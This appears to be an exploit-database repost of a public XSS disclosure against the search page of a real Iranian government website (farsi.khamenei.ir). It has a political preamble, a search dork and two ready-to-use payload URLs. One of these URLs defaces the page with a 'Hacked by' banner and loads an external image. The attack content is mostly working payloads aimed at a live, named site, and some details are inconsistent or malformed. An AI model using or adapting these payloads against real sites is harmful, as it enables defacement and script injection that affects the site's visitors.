Advertisement






Khameneie.ir XSS vulnerabilities

CVE Category Price Severity
N/A CWE-79 N/A Critical
Author Risk Exploitation Type Date
Unknown High Remote 2022-10-23
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100062

Below is a copy:

Khameneie.ir XSS vulnerabilities
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
confidential "Top Secret" 
This message is written to describe the security issue and is confidential and should not be included in the report


This site belongs to the organization of the leader of the Islamic Republic of Iran "Khamenei".
who ordered the killing of Mehsa Amini, a 22-year-old Iranian woman, and she was killed by the moral police, and the people protested in the streets, and now the Iranian police are trying to identify these people.
This site has a security issue with an XSS vulnerability.
We have reported many times to this site that it has a security problem and it has ignored our report.
We want to definitely register and report this security issue

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*


################################################## ################################################## #####################
# #
# Exploit Title : Khameneie.ir has XSS vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : khamenei.ir (https://farsi.khamenei.ir) #
# #
# Tested ON : All language version Host #
# #
# Security Risk : ~[Critical]~ #
# #
# Description : Description: All websites with this version used can be targeted  #
# #
# DorK : "intext:"site:farsi.khamenei.ir/search-result?q=" #
# #       site:farsi.khamenei.ir/search-result?q=YOUR KEYWORD&
# #
# #
################################################## ################################################## #####################




Details :


the vulnerable file is "book-archive"



XSS Expl0iTs :


https://farsi.khamenei.ir/search-result?q=%3CXSS%20SCRIPT%3E&nt=99,101,2,4,9,1,16,

Dem0 :

https://farsi.khamenei.ir/search-result?q=%3C/script%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ccenter%3E%3Ch1%3EHacked%20by%20E1.Coders%3C/h1%3E%3Cimg%20src=%27https://cybercrimemag.wpenginepowered.com/wp-content/uploads/2018/11/Keyboard-Typing-700x467.jpg%27%3E%3Ccenter%3E%3Ch2%3ERUSSIAN%20-%20BLACK%20-%HAT%20%3C/h2%3E%3C/center%3E%3Ch2%3ESECURITY_is_Low%20~Fuck~%3C/h2%3E%3C/center%3E%22%3C/script%3E&nt=99,101,2,4,9,1,16

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.